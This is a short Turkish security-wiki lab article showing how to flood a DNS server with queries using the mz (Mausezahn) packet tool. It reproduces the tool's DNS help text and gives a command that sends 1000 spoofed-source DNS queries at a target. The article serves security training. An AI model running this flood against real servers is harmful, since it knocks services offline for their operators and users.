Sahte Alan Adları Kullanarak DNS Flood DDoS Saldırısı
BGA Security Wiki sitesinden
Amaç:
Mz aracı kullanılarak sahte alan adları ile DNS sunucunun meşgul edilmesi ve servisin hizmet dışı kalması.
Araç:
- Mz
Lab Senaryosu:
Bu makalede DNS paketlerini üretmek için mz aracı kullanılacaktır. Mz aracı kullanılarak üretilecek DNS paketlerinin parametreleriyle ilgili detaylı bilgiye aşağıdaki gibi ulaşılabilir.
root@bt:~# mz -t dns help Mausezahn 0.34.9 - (C) 2007-2009 by Herbert Haas - http://www.perihel.at/sec/mz/ | DNS type: Send Domain Name System Messages. | | Generally there are two interesting general DNS messages: queries and answers. The easiest | way is to use the following syntax: | | query|q = <name>[:<type>] ............. where type is per default "A" | (and class is always "IN") | | answer|a = [<type>:<ttl>:]<rdata> ...... ttl is per default 0. | = [<type>:<ttl>:]<rdata>/[<type>:<ttl>:]<rdata>/... | | Note: If you only use the 'query' option then a query is sent. If you additonally add | an 'answer' then an answer is sent. | | Examples: | | q = www.xyz.com | q = www.xyz.com, a=192.168.1.10 | q = www.xyz.com, a=A:3600:192.168.1.10 | q = www.xyz.com, a=CNAME:3600:abc.com/A:3600:192.168.1.10 | | Note: <type> can be: A, CNAME, or any integer | | | OPTIONAL parameter hacks: (if you don't know what you do this might cause invalid packets) | | Parameter Description query / reply) | ------------------------------------------------------------------------------------- | | request/response|reply ..... flag only request / n.a. | id ......................... packet id (0-65535) random / random | opcode (or op) ............. accepts values 0..15 or one of std / 0 | these keywords: | = std ................... Standard Query | = inv ................... Inverse Query | = sts ................... Server Status Request | aa or !aa .................. Authoritative Answer UNSET / SET | tc or !tc .................. Truncation UNSET / UNSET | rd or !rd .................. Recursion Desired SET / SET | ra or !ra .................. Recursion Available UNSET / SET | z .......................... Reserved (takes values 0..7) 0 / 0 | (z=2...authenticated) | rcode ...................... Response Code (0..15); interesting 0 / 0 | values are: | = 0 ...................... No Error Condition | = 1 ...................... Unable to interprete query due to format error | = 2 ...................... Unable to process due to server failure | = 3 ...................... Name in query does not exist | = 4 ...................... Type of query not supported | = 5 ...................... Query refused | | Count values (values 0..65535) will be set automatically! You should not set these | values manually except you are interested in invalid packets. | qdcount (or qdc) ........... Number of entries in question section 1 / 1 | ancount (or anc) ........... Number of RRs in answer records section 0 / 1 | nscount (or nsc) ........... Number of name server RRs in authority 0 / 0 | records section | arcount (or arc) ........... Number of RRs in additional records section 0 / 0
Mz aracı kullanılarak hedef DNS servisine sahte IP adreslerinden gelecek şekilde DNS istekleri göndererek DNS servisinin meşgul edilmesi ve hizmet dışı bırakılmasına ilişkin uygulama aşağıdaki tabloda gösterilmiştir.
root@bt:~# mz -A 5.5.5.5 -B 1.2.39.40 -t dns "q=www.bga.com.tr" -c 1000 Mausezahn will send 1000 frames... 0.05 seconds (20000 packets per second)